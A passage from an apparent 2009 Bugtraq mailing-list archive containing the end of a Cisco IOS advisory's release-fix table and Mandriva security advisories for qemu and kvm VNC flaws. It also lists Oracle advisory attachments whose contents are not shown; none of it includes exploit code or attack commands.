| 12.2SED    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEE    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEF    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)    |
| 12.2SEG    | first fixed | EX112.2(44) |
|            | in 12.2EX   | SE4         |
|------------+-------------+-------------|
| 12.2SG     | 12.2(44)SG  | 12.2(50)SG  |
|------------+-------------+-------------|
| 12.2SGA    | 12.2(31)    | 12.2(31)    |
|            | SGA9        | SGA9        |
|------------+-------------+-------------|
| 12.2SL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SM     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRA    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRB    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
| 12.2SRC    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SRD    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2STE    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2SU     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2SV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SW     | first fixed | 12.4(15)T8  |
|            | in 12.4SW   |             |
|------------+-------------+-------------|
| 12.2SX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXH    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SXI    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2SY     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2SZ     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2XF     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XK     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(20)    |
|            |             | S1212.2(33) |
|            |             | SB312.2(33) |
| 12.2XN     | 12.2(33)XN1 | SRC312.2    |
|            |             | (33)        |
|            |             | XNA212.2    |
|            |             | (33r)SRD2   |
|------------+-------------+-------------|
| 12.2XNA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2XNB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | 12.2(46)XO; | 12.2(46)XO; |
| 12.2XO     | Available   | Available   |
|            | on          | on          |
|            | 02-FEB-2009 | 02-FEB-2009 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XQ     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XR     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XS     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XT     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XU     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XV     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2XW     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2YA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YC     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YE     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YF     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YG     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YH     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2YM     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2YN     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2YP     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YQ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YS     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2YT     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YU     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YW     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.2(13)ZC  |             |
|            | are         |             |
| 12.2ZC     | vulnerable, |             |
|            | release     |             |
|            | 12.2(13)ZC  |             |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|------------+-------------+-------------|
| 12.2ZD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZF     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZG     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZH     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2ZJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZU     | migrate to  |             |
|            | any release |             |
|            | in 12.2SXH  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZX     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2ZY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZYA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.3-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3       | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3B      | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3BC     | 12.3(23)BC6 | 12.3(23)BC6 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3BW     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3EU     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.3JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3JK     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3JL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3T      | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3VA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XC     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XD     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XG     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XI     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XK     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XL     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XQ     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XR     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XS     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XW     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XX     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XY     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XZ     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3YA     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YF     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YH     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YI     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YM     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YQ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YS     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YX     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3ZA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.4-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
| 12.4       | 12.4(16)    | 12.4(23)    |
|------------+-------------+-------------|
| 12.4JA     | 12.4(16b)JA | 12.4(16b)   |
|            |             | JA1         |
|------------+-------------+-------------|
| 12.4JDA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JL     | 12.4(3)JL1  | 12.4(3)JL1  |
|------------+-------------+-------------|
| 12.4JMA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JMB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(16b)   |
| 12.4JX     | first fixed | JA1         |
|            | in 12.4JA   |             |
|------------+-------------+-------------|
| 12.4MD     | 12.4(15)MD  | 12.4(15)MD2 |
|------------+-------------+-------------|
| 12.4MR     | 12.4(16)MR  |             |
|------------+-------------+-------------|
| 12.4SW     | 12.4(11)SW3 | 12.4(15)T8  |
|------------+-------------+-------------|
| 12.4T      | 12.4(15)T   | 12.4(15)T8  |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XB     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XC     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XE     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XM     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XN     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4XQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XR     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            |             | 12.4(11)    |
|            |             | XW10;       |
| 12.4XW     | 12.4(11)XW3 | Available   |
|            |             | on          |
|            |             | 22-JAN-2009 |
|------------+-------------+-------------|
| 12.4XY     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XZ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4YA     | Not         |             |
|            | Vulnerable  |             |
+----------------------------------------+

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC58ACgkQ86n/Gc8U/uA6vACfY36eBjbCbnJsrnJlOCE0Mr6Y
JqUAn1TVyUvBk8lGTm94F+tvmZy4n3Ke
=cGUi
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:32:17 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:008 ] qemu
Date: Tue, 13 Jan 2009 22:47:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMyaj-0004iA-BN@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:008
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of qemu version 0.9.1 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 502c50a55fdb3e3e8ab0456be79a08b1  2009.0/i586/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm
 bf48619b2f7cb0275d379682a4795dc1  2009.0/i586/qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm
 4fb74c4d8356442ccd9c6ddd063f4191  2009.0/i586/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 99f7c6b4de73bcab46664c90ae6edc50  2009.0/x86_64/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm
 a22b95b6a4673f1300742b4777c4149b  2009.0/x86_64/qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm
 502371419a98b187c9db90e4217242de  2009.0/x86_64/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVFvmqjQ0CJFipgRAjcTAJ4rTf6Icqu1/43aSLb/G0TZbE4IFwCeKQN2
MzEgGFk72/muA0J0kDkvqhc=g6Xd
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:32:17 2009
Date: Wed, 14 Jan 2009 13:45:07 +0300
From: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
X-Mailer: The Bat! (v3.99.29) Professional
Reply-To: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <1554988.20090114134507@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: Oracle CPU Jan 2009 Advisories.
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------BBCA1ED38A711B4"
Status:   

------------BBCA1ED38A711B4
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Advisories for Oracle CPU January 2009 vulnerabilities Attached.





Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@dsec.ru  
www.dsec.ru


------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="[DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="[DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt"

------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="=?windows-1251?Q?[DSECRG-09-002]_Oracle_BEA_Weblogic_10_Linked_SS_vulnerability.txt?="
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="=?windows-1251?Q?[DSECRG-09-002]_Oracle_BEA_Weblogic_10_Linked_SS_vulnerability.txt?="
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------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="[DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="[DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt"
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------------BBCA1ED38A711B4--


From - Wed Jan 14 13:42:17 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:009 ] kvm
Date: Tue, 13 Jan 2009 22:57:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMykP-0004lZ-18@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:009
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kvm
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of kvm version 79 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 acdff9c09970bba49f5b500723092f2b  2009.0/i586/kvm-74-3.1mdv2009.0.i586.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b84f9ff6c8005e7de6996b3e1f04335d  2009.0/x86_64/kvm-74-3.1mdv2009.0.x86_64.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm
